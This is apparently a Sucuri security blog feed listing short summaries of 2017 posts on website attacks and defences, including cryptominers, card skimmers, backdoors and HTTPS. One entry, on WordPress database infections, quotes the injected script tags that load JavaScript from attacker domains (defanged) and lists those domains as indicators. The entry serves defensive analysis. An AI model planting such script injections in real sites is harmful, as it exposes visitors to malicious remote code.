
Web Security

  • Hacked Websites Mine Cryptocurrencies (22 September 2017)

    Cryptocurrencies are all the rage now. Bitcoin, altcoins, blockchain, ICO, mining farms, skyrocketing exchange rates – you see or hear about these every day in the news now. Everyone seems to be trying to jump on this bandwagon.

    This trend resulted in the emergence of online platforms that allow webmasters to install coin miners into their websites as an alternative means of monetization. The most notable platforms that provide JavaScript cryptocurrency miners for websites are JSE Coin and Coinhive.

    Continue reading Hacked Websites Mine Cryptocurrencies at Sucuri Blog.

  • Ecommerce Security: Fake Jquery Used as CC Scraper (21 September 2017)

    In the last few months, we noticed an increase in attacks targeting ecommerce platforms aiming to steal credit card information. We saw a similar rise last year after the summer ended, and believe that trend will continue now that the holiday season is quickly approaching.

    Most of these attacks are based on intercepting the communication between the online store and the payment gateway (the checkout process) in order to send valuable information to the attacker.

    Continue reading Ecommerce Security: Fake Jquery Used as CC Scraper at Sucuri Blog.

  • Using a VeraCrypt File Container to Encrypt Local Website Files (19 September 2017)

    If you are doing website development and have a local repository, or store website backups on your computer, you should strongly consider encrypting these sensitive files.

    In the event that your computer is compromised, the encrypted container prevents an attacker from gaining access to your website (via database configuration files) and other private data.

    This guide shows you how to install and use VeraCrypt – a free, open-source encryption tool that works on all operating systems, previously known as TrueCrypt.

    Continue reading Using a VeraCrypt File Container to Encrypt Local Website Files at Sucuri Blog.

  • Malicious Backdoors: Fake Images and Strrev Functions (15 September 2017)

    When a website is compromised, attackers frequently leave behind a backdoor – according to our research, around 70% of all website hacks include a backdoor. These backdoors are not designed to attack a website or destroy data; instead, they allow an attacker to re-enter a targeted website with little to no authentication, providing them with unauthorized access to the system.

    Backdoors can be planted anywhere within a site, file system, or database.

    Continue reading Malicious Backdoors: Fake Images and Strrev Functions at Sucuri Blog.

  • Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data (13 September 2017)

    Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).

    The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

    Typical injected scripts look like this:

    <s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'></script>

    Or:

    <s cript type="text/javascript">var t = document.createElement("script");
    t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
    document.head.appendChild(t);</script>

    Or:

    The most noticeable malicious URLs that we’ve seen lately are:

    They are all new domains registered specifically for this attack:

    • traffictrade[.]life – created on July 3rd, 2017
    • trysomethingnew[.]eu – created on Aug 11th, 2017
    • sometimesfree[.]biz – created on August 22nd, 2017
    • givemealetter[.]biz – created on August 27th, 2017
    • simplefunsite[.]info – created on September 2nd, 2017
    • dancewithme[.]biz – created on September 5th, 2017
    • trymynewspirit[.]com – created on September 18th, 2017

    Malware in WordPress Database

    In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!

    Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.

  • New Guide on How to Implement HTTPS / SSL Certificate (11 September 2017)

    HTTPS is a hot topic among online marketers and SEO professionals who understand the future of the web needs to be more secure. Not just for the good of the internet, but to increase visibility and lower the chances of being penalized.

    Search engines and web traffic authorities are ramping up efforts to encourage website owners to learn how to implement SSL certificates. We just recently wrote about how Google Chrome will be showing warnings on HTTP websites in October if they contain user input fields (login, contact forms, search bars, etc.).

    Continue reading New Guide on How to Implement HTTPS / SSL Certificate at Sucuri Blog.

  • Creating a Basic Website Security Framework (8 September 2017)

    When you build or remodel a house, construction workers create a strong framework that can withstand the elements to keep your home and possessions secure. But what happens if you ignore proper building codes and inspections? The resulting risks to health and security are unacceptable.

    The same concept applies to how you secure your websites and the environments they reside in. You have to start with a blueprint that prioritizes security through regular maintenance.

    Continue reading Creating a Basic Website Security Framework at Sucuri Blog.

  • Affiliate Cookie Stuffing in iFrames (5 September 2017)

    Inline frames (iFrames) are an easy way to embed content from another site onto your own. This element allows you to insert another document inside an HTML page and can be really useful for embedding interactive applications like Google maps, advertisements and ecommerce applications.

    iFrame elements are also popular with website attackers because they allow attackers to easily load malicious content from their own servers.

    Attackers often use this feature to insert malicious content into compromised sites for the purpose of spam redirection, phishing, and distributing malware.

    Continue reading Affiliate Cookie Stuffing in iFrames at Sucuri Blog.

  • Intro to Securing an Online Store (1 September 2017)

    Ecommerce websites have one of the most difficult challenges in the web security space – keeping the implicit trust of a customer in order to make them feel safe shopping on the site.

    Whether the business started as a local brick-and-mortar shop, or deployed online from the start, it’s easy to design a website and organize content. It’s not as easy knowing how to design a security framework for ecommerce.

    In this post we’ll introduce some basic security concepts and how to think about security for your online store.

    Continue reading Intro to Securing an Online Store at Sucuri Blog.

  • Mining Adminers – Hackers Scan the Internet For DB Scripts (30 August 2017)

    Hackers are constantly scanning the internet for exploitable sites, which is why even small, new sites should be fully patched and protected. At the same time, it is not feasible to scan the whole internet with 330+ million domains and billions of web pages. Even Google can’t do it, but hackers are always getting better at reconnaissance.

    Despite these limitations, scanning just 1% of the internet allows attackers to discover thousands of vulnerable sites.

    Continue reading Mining Adminers – Hackers Scan the Internet For DB Scripts at Sucuri Blog.

  • Google Warnings For Form Input Over HTTP Coming in October (28 August 2017)

    For years, Google has been actively seeking ways to encourage website owners to implement SSL certificates. SSL allows websites to be accessed over HTTPS, which encrypts information sent between the visitor and web server.

    Recently, we discussed how Google is moving from a reward system to a punitive one. Websites using SSL continue to get an SEO boost since it became a confirmed ranking signal in 2014, but we noticed a few months ago that Google was blacklisting non-HTTPS websites that allowed password fields and credit card forms to be filled.

    Continue reading Google Warnings For Form Input Over HTTP Coming in October at Sucuri Blog.